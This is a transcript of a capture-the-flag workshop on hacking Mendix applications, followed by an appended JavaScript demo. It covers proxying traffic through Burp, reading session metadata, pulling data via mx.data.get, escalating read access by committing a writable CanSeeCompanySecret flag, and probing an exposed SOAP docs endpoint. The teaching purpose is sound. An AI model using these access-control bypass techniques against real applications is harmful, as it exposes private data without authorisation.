YouTube Transcript: Amer Edition: Dirk van Veen, Hacking Basics Workshop
This content is an introductory workshop on hacking Mendix applications, focusing on the basics of Capture The Flag (CTF) challenges and how to approach them, particularly for beginners. It explains the fundamental architecture of Mendix applications from a hacker's perspective and introduces tools and strategies for identifying and exploiting vulnerabilities.
>> Oh yeah,
>> it's online.
>> Wait, wait. Let's see. What's the link? This one is
>> My current one ends in DHV8.
>> That was the same as the one earlier.
>> Mhm.
>> I didn't, particularly.
>> You didn't change it.
>> No, no. I haven't changed it yet.
>> That's okay, because that's the correct link. It's just that this is from earlier.
>> It works. Do I also have audio?
>> Yeah, you're live.
>> Oh my god. 10 seconds.
>> Have you also shared the screen?
>> Yeah, I've shared my screen.
>> I am live. I've got audio. I've got the go-ahead to start. All right.

So, good day everyone and welcome to this workshop, presentation, whatever you would like to call it. I'm going to be talking to you about some hacking basics, if you've never done a CTF before. If at any point you have any questions, just ask them. I've got people sitting here who will hopefully signal to me that there are questions.
My name is Dirk. I am founder of the S-Unit. We are a penetration testing company in the Netherlands. I started as a pentester around 2011 and I've been breaking Mendix now since 2015, so that's about 10 years. Aside from pentesting, I also do the organization of CTFs. I'm the original creator of this CTF, which has now grown from a small 40 participants to over 1500 worldwide.
I'm here to talk to you about what a CTF is and how you actually get started with hacking. To do that, I have to give a slight introduction about Mendix as a system and how that translates into how I see it as a hacker.

When you look at the Mendix documentation you will see this image. It is a very famous image, but it is an image that I don't really like, and that is because all of the Mendix components here are stacked vertically, and that does not correspond to reality. It suggests that it's one monolithic structure. Well, in reality there is a gap. There is a huge gap. If we visualize this gap by putting the client on the left and the runtime on the right, we can show that this gap is the big bad internet.
If you realize that there is a big bad internet between the client side and the runtime, then all of a sudden it becomes more intuitive to realize that this bit on the left, the Mendix client, is just your browser. It may be a browser on your desktop, it may be a browser on your mobile phone, but it is just a browser, and it is everything that you model within that browser. So on the left side we have your pages, your nanoflows, your widgets, and a boatload of JavaScript and a lot of information that your browser needs to construct the communication between the left side and the right.

The thing on the right side they call the runtime, but actually this is just a web server. It's a web server just like any other web application. And we know that there is some communication between the client and the server, so there will be some API endpoints for this client. But if we look at this image and we have a browser on the left and a web server on the right, then that also means that the arrows that we see going between the client and the server, this traffic, is nothing other than HTTP.
Now, typically when I say this in a workshop, people are nodding at me and they're like, "Yeah, sounds logical, sounds normal. We have a browser, we have a web application, the common language is typically HTTP. So what?" Well, if you realize that all of the traffic between the left and the right side is in HTTP, then that means that everything you build in this client side is just a fancy way of constructing HTTP requests, because everything meaningful that your client code does, anything that will have any influence on your actual data or your actual logic, will result in an HTTP request, and the rest is just fluff. It's just fancy things. The fact that all of this just leads to HTTP messages means that if I want to hack your web application, the only thing I as a hacker have to do is create HTTP messages.

If I have a Mendix application whose client is running on my computer, then I can see all of the HTTP traffic between my browser and the server, which means that any HTTP message that your browser can send, I as a hacker can send as well. So I can pretty much do anything that your browser can do. But if you as a developer choose to do some validation in a client-side component, if you want to do some security, maybe you made something conditionally visible, I can ignore anything that you do on that client side. All I have to do as a hacker is play with HTTP. So yes, I can do anything your browser can, but I am not restricted in the same way that you think your users may be. So anything your browser can do, I can do better.
In practice, this means that whereas a normal user will typically sit behind the laptop with straight communication between the browser and the Mendix application, in my setup that will not be the case. Typically what I will do is run a proxy, where a proxy is just a little bit of software that sits between my browser and the actual website, such that my browser talks to the proxy and my proxy talks to the website. Now, the nice thing is, if my proxy is sitting in the middle, then it can do all kinds of fun things for me: it can decrypt all of the HTTPS, it can create very nice overviews for me as a hacker to see all of the traffic passing through the proxy, and I can use my proxy to manipulate traffic and to generate traffic. So you will typically see me using a browser just to feed my proxy, and then I'll use my proxy to interact with your web application. So where a typical user, when they look at a web application, may be looking at an image like this, just a typical Mendix front end, the majority of the time I will be looking at something like this, where I can actually see all of the requests that my browser sends, including all of the data that it sends and all of the data that it gets back.
Now, with this in mind, it is good to realize that when you have a Mendix application and it runs in the browser, then there is a lot of JavaScript, and Mendix wants developers to be able to customize Mendix applications. So they've also published a lot of nice JavaScript code, a whole JavaScript library, and this JavaScript code has access to a lot of information about the Mendix application that is useful for me as a hacker. Most of this information is directly available from your developer tools, from your JavaScript console, if you open it in a browser and just press F12. So things that you may think of: there is a thing called session data, which contains some metadata, where the metadata contains information about all of the entities that your current user has some form of access to. Not just the entity types, but for each entity type it will have information about the attributes associated with that entity, and not just the attributes but also all of the associations. So there is a lot of information about your domain model directly accessible from your browser.
In a similar way there's a lot of information about microflows and functionalities in your application. They're also in that session data, but then not in the metadata but in the microflows, where if you're using an older version of Mendix, so anything before Mendix 9.20, then the session data microflows will actually contain all of the microflow names, all of the names of microflows that your current user has access to. Although that should not be a vulnerability in and of itself if you do your access control properly, if you don't have any superfluous roles in the allowed roles, Mendix has noticed that a lot of developers are a little bit too loose with assigning privileges. So what Mendix did in 9.20 is they said, we are going to remove information about microflow names. We're going to substitute that with randomly generated gibberish called operation IDs. So if you're in an older version of Mendix, there's a whole lot of information about the microflows. If you're above 9.20, the information is still there, but it is a bit obfuscated.
Now, the session microflows don't just contain information about the microflows but also a little bit about how microflows work under the hood. Not a lot, but there is some metadata in the form of which parameters the microflow expects and which associations are used within the microflow to retrieve data through associations, because say that a microflow needs to retrieve data over an association from one of its input objects, then it may very well be that your browser changed some of the data of the associated object. So your browser has to know that it has to send that associated object as well.

Now, this metadata can be used to do interactions with the back end, and those interactions usually go through one single endpoint on the back end server, which is /xas, the access endpoint, and pretty much anything that you model in Studio Pro that has some backend interaction will lead to some interactions with this endpoint.
So, things that you will quite often use when you're hacking: you would like to retrieve data from the client API from JavaScript. There is a documented function called mx.data.get which you can use to retrieve data using XPath. If you look under the hood, that results in a call to a retrieve-by-XPath action. In a similar way there is functionality to execute microflows from JavaScript; you would use mx.data.action. If you look under the hood you would see that there's some traffic called execute action. You can manually edit and commit data in JavaScript through mx.data. Through Burp you will see there's an action called commit. There are a lot of useful things that you can do through the client API, and we will see a few, and how to use them, when we go through one of the exercises.
Now, before I continue, I do have to say that I as a hacker use a lot of the JavaScript and a lot of Burp, but we do know that a lot of first-time participants are not that well versed in JavaScript, they have never used Burp before, but they do want to start somewhere. So what we've seen is that a lot of new participants like to go for a bit of easy mode, because you don't have to use a proxy, you can also use browser plugins. In particular there is one browser plug-in that is used quite often, in the form of the Cyphix Mendix Dev Tools, formerly the Bizzomate Mendix Dev Tools. Basically, this is just a browser plugin specifically for Chrome. You can download it in the Chrome Web Store. It's all legit. This extension, this browser plug-in, provides a nice clickable user interface with which you can see all of the data that your current user has access to. You can use it to edit data. You can use it to call microflows if you know the microflow name. All without ever having to do any JavaScript programming yourself.
If you have this plug-in installed, then it should load automatically if you are visiting a Mendix application that uses the official marketplace module for dev tools, because there's a module in the marketplace which basically broadcasts, saying "hi, I want Cyphix". That is not the default. You have to actively install it in your application. But that doesn't mean that those are the only applications where you can use this plug-in, because it's a plug-in. It lives in your browser, and you can tell your browser to load it whenever you like. The easiest way to do this is through JavaScript.
I've created a little paste where you can find the JavaScript. I promise you I did not put in any backdoors. It's like six lines of JavaScript code, nothing more, and if you do this then you will basically have that plug-in available in the challenge environment. Now, it is easy mode. So there are things that are a lot easier, but this is not as flexible as JavaScript itself or as Burp. There are some things that you can do very easily, but there are some things that this plug-in will not be able to do. If you use this plug-in, it will look like this, where you have a lot of information about various entities within the database and even your data in the database, where basically the only thing that this plug-in does is automate some of the features that I just told you about. So it will automate going through the metadata, it will automate retrieving all data from the client API based on what it sees in the metadata, etc.
Now, moving on, because this was just about hacking in general, but we are not hacking in general. We are playing a CTF. It's a game, a game with particular goals, and you can actually use the goals of the game to improve your experience of the session. So one of the first things that we want to tell you is: please choose your difficulty. If you go to the scoreboard, if you log in, if you go to the challenges, you will notice that there are three different categories. Those categories correspond with difficulty levels, where the first category, the Pizza Mario application, is aimed more at beginner CTFers. We estimate that those challenges are easy to medium difficulty, and we've tried to make this beginner friendly. So many of the challenges in this app are doable from the browser, or maybe even completely from the Cyphix dev tools. We built the application on a Mendix version prior to 9.20, so you don't have to worry about all of the obfuscation that I mentioned before. And because this is intended to be the easier level, this is also the application where you are more likely to get useful hints from the coaches.
One level up from the beginners is the advanced. That's the patient portal, which we guesstimate would be medium to hard, and this is really a step up from the beginners. If you look at it, you will notice it is running Mendix 10.24. So you no longer have access to microflow names. You will have to deal with all of the obfuscation that I mentioned before. But it gets a bit worse, because we thought, what would be more annoying, or more funny, than enabling strict mode? And the thing that strict mode does is it disables a lot of the features that would normally be available from JavaScript. So people that have trained in previous years on their JavaScript skills will have to start developing an additional skill set. This also means that if you want to play these challenges, you will likely have to use Burp, you will likely have to use JavaScript, and you will not be able to do everything just from the Cyphix dev tools. And because these challenges are more difficult, typically you will also receive fewer hints than for the beginner challenges.
Now, there is an additional level, the one that we call magic. Basically, the magic category is the category where we say, you know what, good luck, we're not going to tell you anything. These are challenges that are intended to be difficult, and you will not be guided here. So this really is aimed at those that are already familiar with the advanced and want an additional challenge. So if you say, "Oh, this is my first Mendix CTF," start with the beginner challenges and from there move upwards through the difficulty levels.
Now, when I mention difficulty levels, you do have to realize that as challenge makers, we have to estimate what the audience will find difficult and what they will find easy, and that estimate is not always accurate. To compensate for that, we use dynamic scoring, which means that points will go down the more a challenge gets solved. This in turn means that if you find yourself getting stuck and you don't know where to start, a very safe route would be to look at the scoreboard, go for the challenge with the least amount of points, because apparently that's the one that all of your competitors think is the easiest, and then work your way up from lower to higher number of points. If you do this, then if you're doing a challenge with lower points, you can also request more hints from coaches. So don't shy away from getting into contact with one of the coaches, either the coach on site if you're on a satellite location, or one of the coaches online. And because scores evolve over time, we advise periodically checking whether the scores are still the same, or whether there's a new challenge which has gotten a lot of solves, because that would be a good indicator for what to go for next.

Now, if you do sort the challenges by points, then you may encounter situations where one of the advanced challenges has more solves than one of the beginner challenges. That is normal. So if there is a so-called advanced challenge with a low score, that is an indicator that it would be a good point to continue before moving on to the high point
Then you have a strategy on which challenges to solve. Now, how to go about solving an individual challenge? If you want to think about that, then it's good to realize every challenge has a goal, where of course the goal is to find the flag that we've hidden somewhere. But if you realize this goal, then you can also start thinking about, okay, where can flags be hidden? Typically there are not that many different locations where we as organizers can hide flags. So things that you should think about when searching for flags: flags stored within one of the entities. Maybe there is an attribute that you have read access on that has a flag, or maybe there is an attribute that you don't have read access to yet, but that you do have methods of granting yourself read access to. That would typically be a nice place for us to hide a flag.
In a similar way, the moment that a flag is related to application logic, we will frequently hide the flag within a microflow. Maybe a microflow that performs a particular validation, so that when the microflow detects that you bypassed a particular security measure, it will all of a sudden produce a flag. And we typically like to hide flags in UI components. So maybe a page, maybe a nanoflow, something that runs within your browser, but that may not be immediately visible if you just open
Then, if you look at the scoreboard, you will notice that challenges have titles and challenges have descriptions. As challenge makers, we really like to give you small hints, small nudges on how to solve the challenge, because the fun part for us is not to have you go wild about "oh, I don't know what I have to do." The fun part for us is when you actually know what to do, but to make the how the difficult part. So when you are reading a challenge, look for keywords that relate to particular parts of the application, keywords that give hints on where in the application you might find the flag. Sometimes we will just explicitly tell you in a challenge, "hey, please do X." If we're talking about pizza, maybe we'll tell you, okay, we want you to buy a million pizzas, or maybe we want you to get a free pizza, or maybe we want you to send a pizza to outer space, where the instruction in the challenge will lead to a flag if you somehow manage to fulfill the condition mentioned there.
And if you do this and, even when looking at the title and description, you don't have any idea what the goal of the challenge is, don't rush to the application. Don't start blindly rummaging around. But discuss with your teammates, brainstorm, look at what they think the goal would be, because the chance of success is a lot higher if you have a good idea of the goal of the challenge. If your team members also have no idea what to do, try to brainstorm with a coach, because we will typically help you at least realize the goal.

Then when you do hack, when you do have an idea of what to do, it is very easy to accidentally get stuck in tunnel vision, where you're looking 5 minutes at a thing, 10 minutes at a thing, no progress, no progress, and five hours later you still made no progress but just created a lot more frustration.
If you notice that you get stuck, there are things to avoid tunnel vision. One of the things is: try to recognize when you are mainly looking at your application through the browser, or mainly through the Cyphix tool, or mainly through Burp, so that you can force yourself to alternate between the various viewpoints, because differing viewpoints will trigger different thoughts in your brain and may help you to create new connections in your thinking and to draw new conclusions. The second: you have team members, use them. Brainstorm with them, not only about the goal but also about ideas you have about reaching the goals. Maybe brainstorm about roadblocks that you see and ways that you do or do not see to get around the roadblocks, just to see whether your teammates agree with you or maybe they see something else entirely.
Then, if you are stuck with one of the challenges, we have over 25 challenges. There are plenty of other challenges to look at. You will find that if you switch your attention to another challenge, it may turn out to be an easier one and it may help you progress along. And if even that doesn't work, don't forget to take a break. Our brains process information best when we're not actively thinking about things. So go have a drink, talk to other people, go outside, have a breath of fresh air. Actually, one of the best places to hack is the shower, because you cannot actually actively look at your screen. You're just forced to relax and let your brain wander around, and that is typically when the most genius ideas pop up. Finally, if all else fails, grab a coach, ask them to be a rubber duck, ask them for hints. This is intended to be a learning experience.
And finally, during the opening, I'm not sure if it was mentioned in the American opening, but in the European opening there was a question about AI. We do recognize that AI is being used a lot more in security testing and in defense. And the sad thing about AI is AI has things wrong a lot. So you cannot trust AI to do something well, or actually, you cannot trust AI to come up with the right answer. But AI is a very good brainstorming partner. So if you have no idea what the challenge means, ask ChatGPT: "hey, I'm playing a CTF, these are the hints that I get. What am I supposed to do?" And chances are ChatGPT will come with a lot of ideas, most of which are garbage, but some of which may also trigger you into thinking in the correct direction.

Now, having said all that, let's look at a few practical examples.
To do that, I'm going to look at some challenges that we did a few years ago, starting with this one. This is taken from the scoreboard and we see the challenge description, Survey Logs: "There is a rumor going around that the devs are collecting and selling secret log data within the survey app. Can you find out if this rumor is true? Here is a link to the survey application." Now, the link you see here still works. So I will be doing this live. Feel free to also hack along while I'm showcasing things.

But when I see this, I notice some things. I notice that in the title it says logs, and I notice that in the description I see secret log data. So I see the title word being repeated. This raises a flag; this may be one of the keywords that I have to pay attention to. So my goal is very likely to find data related to logs. Now, there are a lot of places where data related to logs can be hidden. So I'm keeping my options open. I'm going to think, okay, I may have to find entities that are related to logs, or maybe there is an entity that has an attribute that is related to logs, or maybe somewhere in the application there is a microflow that is related to logs. But when I'm going to be exploring this application, I'm going to be actively looking for log data.
I'm going to do this exercise using Burp. So I have my Burp here. I have the professional edition. If you have the community edition, that is
Relatively soon Burp will open. We have a temporary project, and within Burp we have this button, and what this button does is it starts the built-in version of Chrome that is preconfigured to talk to Burp as a proxy. So it is preconfigured to send its traffic to the proxy, and it has been configured with the HTTPS certificates to allow decryption. What I'm going to do here is go to my Mendix CTF 2022-2 .mendixcloud.com address, and as the page is loading I have my Burp. I see all kinds of things happening, and one of the things that is happening is there is this tab called Proxy, where all of
a lot of things may be a little slower because I'm wondering why I'm not seeing the
because we should be seeing the application. We're not getting any error messages. We are
we were very proud that the live stream
Are you going to tell me that the
now the demo effect is going to start
I'm getting a signal that everything's going well. However, I am not actually seeing the web application at the moment. Otherwise, I will have to open this in another browser, which should not be a problem
is a little sad if I wanted to showcase Burp. Oh well.
Here we have the same application, same URL. And we'll just let the one in the background do its thing. If I press F12, then I can open the developer tools, and here we will have access to this mx.session sessionData object. You will also notice that because this is in the JavaScript console there is tab completion, so I don't have to make any typos. sessionData dot metadata, and I can use this to investigate all of the entities within this application. So if I press enter you will see here a bracket and then a comma-separated list of things. The bracket means that this is a list, and this triangle here means that we can expand the list by clicking on the triangle. So I click on it, and now I see a very nice list of items, where we can see item number zero. It has a few key-value pairs: a key-value pair called attributes, properties, object type, where we see object type system.user. So this item represents the user entity from the system module. We see survey.company, survey.survey. We also see a survey.log entity.
And this is where I can combine the information from the challenge with the information that I see on my screen. I knew that I was looking for log-related data. Here I see that there is apparently an entity that seems to be related to logs. I can expand this entity. It has information about attributes. I can expand the attributes, and here I can see that my user may have access, in this case read-only access, on the date/time of the log entry, the source of the log, and the actual log message. Now, going back to the challenge, we had to find secret log data, so that could correspond to the log messages here in the app. If I want to retrieve that data, I have to do some JavaScript magic, and the nice thing is Mendix has a lot of documentation about its magic. So if you Google for the Mendix client API, you'll see that the first link is a nice page about the client API. Sadly, Mendix is slowly reducing the capabilities of the client API, but luckily this is an older version. We can actually check mx.version. This is built on 9.19, so that's before 9.20. So we can use the legacy APIs.
We open the documentation for the Dojo API and let's make this a little bit smaller. Within this documentation you will notice that there is a concept of namespaces, where the data namespace contains a lot of functionality related to interactions with the runtime. Now, one of the interactions here is mx.data.get, which, as the documentation says, retrieves MxObjects from the runtime. It says it can do it based on GUIDs, a microflow, or XPath. Now, I don't know anything about microflows, I don't know anything about GUIDs, but as a Mendix developer I do know about XPath. So what I'm going to do is look at the example code. I'm going to look for an example of mx.data.get with XPath. And here I see it.
I paste it in my console. You may get a message warning you that pasting JavaScript code is very, very dangerous. That is 100% true. One of my goals when I'm hacking an application is to see if I can execute my JavaScript in the browser of another user. Thankfully, the JavaScript here in the Mendix documentation is benign. We don't have to worry about that. So if you get a message that says "please type allow pasting", then all you would have to do is type "allow pasting" and hit enter. Then you should be able to paste the code. If I look at the code, we are currently saying we would like to retrieve data from the client API based on this XPath query. Now, we are not interested in system.user. We
So now we can tell the back end we would like to retrieve all survey.log objects. And what you will notice is that there is a second key-value pair here called callback.
Now, the way that the Mendix JavaScript API works is that mx.data.get does not know beforehand how long a particular database query will take: whether it's a very simple query, whether it's a very complicated query, whether there's a lot of data to be returned. So what the Mendix client library has said is, any time we do back-end interactions we're going to do those in the background. We are not going to wait for the function to complete. We're just going to do this in the background so that the rest of the JavaScript code can keep running. But that also means that the result of this query will not be immediately available on my console. Instead, what Mendix has done is they say, if you provide a key-value pair called callback, then whichever function you put here will receive the output of the back-end interaction. So if we were to find any logs they would be here. Let's call these logs instead of objs, because I cannot pronounce objs.
And the most simple thing that you can do with this is output the logs to the console. So I do console.info and then between parentheses I put logs. I press enter, and all of a sudden I first get a response saying undefined. That is because everything is happening in the background, so there's no immediate result. But really soon after the undefined, I get a message, one of those brackets indicating this is a list. I expand the list. There's one item. I expand the item. We see it is a survey.log. And now it not only has metadata, it also has JSON data. The JSON data will contain the actual data that was in the database. So I can open this. I can go to the attributes. I see a datetime, I see a log source, and I see a very recognizable flag, indicating that I have now solved the challenge. All I now have to do is copy this value, go to the scoreboard, enter it here and press submit. And if I didn't make any copy-paste errors, I should be receiving points.
Now, I did this using JavaScript. JavaScript is not the only way in which you can do this. And interestingly enough, now my Chrome, this is the built-in browser from Burp, all of a sudden started working. So we can actually also see what happens when we execute this JavaScript. So let's also do this here. Here you will see I do get the message saying, "Oh, be careful. Please type allow pasting." So I type allow pasting. Now I can paste. I hit enter. I get the same result. If I now open Burp, I will see there was a POST to the /xas endpoint, the access endpoint that I mentioned. The action that we did was retrieve by XPath. And here we see our nice XPath in the response. We see that we have one result, and here we see the actual log object with our flag.
Now, I mentioned easy mode. What would I have done if I didn't have Burp? If I didn't know anything about JavaScript? If I don't trust myself in copy-pasting JavaScript code and correctly editing it, I could have used the CEX browser plugin. To do that, you would have to add the extension. So we can go to the extension manager in Chrome. Here we can search, and immediately it already finds what we need. I press the button "Add to Chrome". All right, it has been added.

If the plug-in is loaded on a page, I should be able to open it using either Alt+B or Cmd+B, depending on whether I'm on a Windows machine or a Mac. I'm using a Mac, so for me it will be Cmd+B. If I try to press Cmd+B, if I want to do this, I would have to do it after clicking somewhere here on the page. Currently, it doesn't do anything. I have to actively load it. So I take the JavaScript code from the paste link, I put it here, and the only thing that this JavaScript code does is load the JavaScript from the Chrome extension and add it to the page. It loads the styling from the plug-in and adds it to the page. And now I press, they say Cmd+B, but for me it's Option+B. I now see the CEX dev tools, where we can see information about our current state but also information about all of the access we have to data in the database. And here we could have seen, oh, there is apparently an entity Survey. I could have clicked on it. And here I already see information about the Survey.Log. I see my flag. I can copy-paste it and solve the challenge.
Now, not every challenge is this easy. Not every challenge will have just one step. There will be challenges that are more difficult or require more steps. Here we have one called Secret Time: "It's always fun to poke around in applications to see if they accidentally expose juicy information like passwords, health information or company secrets. Can you check what you can find if you give the survey app a good shake?"

Now, here I see something related to secrets. I see passwords, which I know are secrets. I see something called company secrets. So I make the assumption that my goal is to find data related to either passwords or to company secrets. And once again, this may be in entities, where, if it's in an entity, these are typically attributes. So I'm just going to focus on attributes. I could still look at microflows as well. But let's start with the data. And we can actually do this one straight from the CEX tool, because if we want to find passwords or company secrets, passwords are typically related to users. Company secrets are related to companies. And I do see in this custom Survey module that there is an entity Survey.Company. I can click on it and I see apparently there is an attribute called CompanySecret. However, I don't have read access on CompanySecret for this particular company. Now, the fact that I can see CompanySecret as an attribute means that there may be cases where I do have access to CompanySecret. So I can start to think about how I could get access to CompanySecret, or how they could have prevented me, how they can actively prevent me from this access. And typically, if I do see this column but I don't see the value, this means that there is an access rule within the domain model that gives me read access only under a particular XPath constraint.
Now, I was still thinking about passwords. So I can also look at user-related things. We know that you cannot change System.User. There is no user-specific thing here in the Survey module; there is an Administration module. If I click on Administration.Account and I look at the various attributes, I do see that there is a boolean CanSeeCompanySecret, and currently this administrative account has that boolean set to false. Now I can imagine that maybe the read access on CompanySecret uses this CanSeeCompanySecret as part of its XPath constraint. I can test that by just editing this boolean, saying, oh, I don't want it to be false, I want it to be true. Commit. I get a nice message saying the object was committed. And now apparently I do have access. So now I used my write access on a boolean to manipulate the XPath for Survey.Company.
Now, there are a lot of other things that you can encounter. But I think we are almost out of time. I'm also going to look across. We have 10 more minutes, five more minutes. Then I will showcase one final example. Here we have one, Cleanliness: "Developers will always remain a mystery to me. Every time I walk past their lair, they seem to be talking about bathing and cleaning agents. It's always soap this and soap that. You'd think that by now they'd be smelling like roses. Can you figure out what their hype is all about?"

Now, this description is a lot more cryptic. It does not really mention anything about particular data or particular functionality. But we have recurring mentions of soap. And this can be a keyword, because if you think soap, soap is not just a thing that you can wash with. SOAP is also one of the ways in which you can publish integrations in Mendix. So maybe whoever wrote this misunderstood the conversation and the developers were actually talking about SOAP services. So my immediate idea is: maybe I have to find and call a SOAP service, and if not, I have no idea what to do. So what could I do? You could go to Google and search for it, and you can just go to the documentation, and apparently there is a way to publish using SOAP. And here we see, if we just go through the documentation, that when running Studio Pro projects, the published web services documentation address would be /ws-doc. So apparently there may be some documentation on the URL /ws-doc. I can try to see if that URL is accessible.

Now, normally, when you deploy to the Mendix Cloud, Mendix automatically disables this endpoint, or at least it blocks it. But we see in our application this is not blocked. We have information about the Web Services Description Language file, which is basically a file with metadata about the SOAP services. We can also see example requests for how a legitimate request to the SOAP service would look. And I can now use this to actually send a SOAP message...
I hope that this little introduction to CTFs helps you with finding your way around the challenges. If there are any questions, do feel free to ask. I see that there's at least one.

>> remote ... as 20 minutes ago. Why is this possible? Why are these system-related objects available in public scope?
>> So apparently there was a question already 20 minutes ago. Oh, we should pay closer attention to why particular data is so readily available, specifically mentioning system data. So I think that what they were talking about is likely the session data metadata, or maybe the objects in the System module.

But what you should realize is that Mendix is a platform, and the user interface has to do a lot with objects that come back from the runtime. So at some point it will have to know, for a particular attribute: is that going to be a string? Is that going to be a number? Is that going to be a DateTime? Is that going to be a reference to another entity? So at some point a lot of this information will need to be exposed to the client. Now, of course, Mendix could say, okay, we're going to only send things on the fly, but Mendix also wants to be flexible for developers. Mendix wants to enable developers to write arbitrary JavaScript plugins, and Mendix has no control over what your JavaScript plugins want to do, what kind of entities they may come in contact with. So what Mendix has said is: the moment that you choose to give access on a particular entity, we will inform the browser of that entity's existence, of that entity's attributes, because if you grant access on an entity, apparently you intend for that entity at some point to be exposed to the browser. So it's good to realize that when we look at this MX session, the session data metadata, this is not a list of all entities in your application, just the ones that your user actively has some form of access to. And yes, if you look at the System module, each user by default has particular access to their own System.User object, and as such to particular attributes within that object, and as such information about those attributes, or at least the existence and the type of those attributes, is communicated back to the client.

I hope that answered the question. I will give a few seconds for all of the time delays in case you have any follow-ups.

I'm getting the signal that there are no additional questions. So with that I am going to stop the stream. I hope you all feel well prepared to start hacking at least the beginner challenges. If you do have additional questions, if you ever get stuck, reach out to your coaches. They will gladly help you. Hope you have fun, and hope to see you at the next workshop. I will be giving a workshop tomorrow at 10 a.m. Central European Time about the top 10 Mendix vulnerabilities. If you are interested in that as well, I hope to see you then. Otherwise, see you in the future. Bye-bye.
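Editor's added example, not code from the workshop, the speaker, or Mendix. It shows the two techniques the talk walks through: wrapping the callback-style mx.data.get and mx.data.commit calls in Promises so the result is awaited instead of showing up as undefined, flattening the jsonData.attributes map into plain values, and then the Secret Time sequence (read the Survey.Log flag, flip CanSeeCompanySecret on the Account with your write access, re-read Survey.Company). So that it runs offline in Node, it talks to a constructed in-memory stand-in for the Mendix client object mx; the GUIDs, values and the access-rule logic in that stand-in are invented for the demo, and only the call signatures and the jsonData.attributes shape are meant to match the real client.

```javascript
// Editor's added example (not code from the workshop or from Mendix).
// Entity and attribute names mirror the talk; the GUIDs, values and the
// access-rule logic in the stand-in below are CONSTRUCTED for the demo.
//
// Real Mendix client calls used: mx.data.get({ xpath, callback, error }) and
// mx.data.commit({ mxobj, callback, error }); results are MxObjects whose
// jsonData.attributes is a { Name: { value } } map, as expanded in the console.

// "//Survey.Log[...]" -> "Survey.Log"; null for anything the stand-in can't serve.
function entityFromXPath(xpath) {
  const m = /^\/\/([A-Za-z_]\w*\.[A-Za-z_]\w*)/.exec(xpath.trim());
  return m ? m[1] : null;
}

// The talk's point: the client answers in the background through `callback`,
// so wrap it in a Promise and `await` it instead of reading an `undefined`.
function mxGet(mx, xpath) {
  return new Promise((resolve, reject) =>
    mx.data.get({ xpath, callback: resolve, error: reject }));
}
function mxCommit(mx, mxobj) {
  return new Promise((resolve, reject) =>
    mx.data.commit({ mxobj, callback: resolve, error: reject }));
}

// Flatten jsonData.attributes ({ Name: { value } }) into { Name: value }.
function attributesOf(mxobj) {
  return Object.fromEntries(
    Object.entries(mxobj.jsonData.attributes).map(([n, a]) => [n, a.value]));
}

// The two challenges in order: read the flag, then flip the boolean we have
// write access on and re-read the attribute whose read access it gates.
async function demo(mx) {
  const [log] = await mxGet(mx, "//Survey.Log");
  const [companyBefore] = await mxGet(mx, "//Survey.Company");
  const [account] = await mxGet(mx, "//Administration.Account");
  account.set("CanSeeCompanySecret", true);
  await mxCommit(mx, account);
  const [companyAfter] = await mxGet(mx, "//Survey.Company");
  return {
    flag: attributesOf(log).Flag,
    secretBefore: attributesOf(companyBefore).CompanySecret, // undefined: withheld
    secretAfter: attributesOf(companyAfter).CompanySecret,
  };
}

// Constructed in-memory stand-in for `mx` so the pattern runs offline in Node.
function makeFakeMx() {
  const makeMxObject = (entity, guid, attrs) => ({
    getEntity: () => entity, getGuid: () => guid,
    get: (name) => attrs[name], set: (name, value) => { attrs[name] = value; },
    _attrs: attrs, // demo-only: the "database row" behind the object
  });
  const store = [
    makeMxObject("Survey.Log", "281474976710657", {
      DateTime: "2024-01-01T00:00:00.000Z", LogSource: "survey",
      Flag: "FLAG{constructed-demo-flag}" }),
    makeMxObject("Administration.Account", "1970324836974593", {
      Name: "demo-user", CanSeeCompanySecret: false }),
    makeMxObject("Survey.Company", "3096224743817217", {
      Name: "ACME", CompanySecret: "constructed-company-secret" }),
  ];
  // Simulated access rule: CompanySecret is readable only while the caller's
  // Account has CanSeeCompanySecret = true (the XPath constraint guessed at in the talk).
  const withheld = (obj, name) =>
    obj.getEntity() === "Survey.Company" && name === "CompanySecret" &&
    !store.find((o) => o.getEntity() === "Administration.Account").get("CanSeeCompanySecret");
  // What the client receives: a copy with readable attributes only, plus jsonData.
  const toClient = (obj) => {
    const attrs = Object.fromEntries(
      Object.entries(obj._attrs).filter(([name]) => !withheld(obj, name)));
    const copy = makeMxObject(obj.getEntity(), obj.getGuid(), attrs);
    copy.jsonData = { objectType: obj.getEntity(), guid: obj.getGuid(),
      attributes: Object.fromEntries(Object.entries(attrs).map(([n, v]) => [n, { value: v }])) };
    return copy;
  };
  return { data: {
    get: ({ xpath, callback, error }) => {            // asynchronous, like the real client
      const entity = entityFromXPath(xpath);
      setTimeout(() => (entity
        ? callback(store.filter((o) => o.getEntity() === entity).map(toClient))
        : error(new Error("unsupported XPath: " + xpath))), 0);
    },
    commit: ({ mxobj, callback }) => {                // write the edited copy back
      Object.assign(store.find((o) => o.getGuid() === mxobj.getGuid())._attrs, mxobj._attrs);
      setTimeout(callback, 0);
    },
  } };
}

demo(makeFakeMx()).then((result) => console.info(result));
```

In a real Mendix page you would drop makeFakeMx, pass the page's global mx to demo, and read the result in the console; the withheld attribute shows up there exactly as in the talk, as a column you can see in the metadata but with no value in jsonData until the access rule's constraint is satisfied.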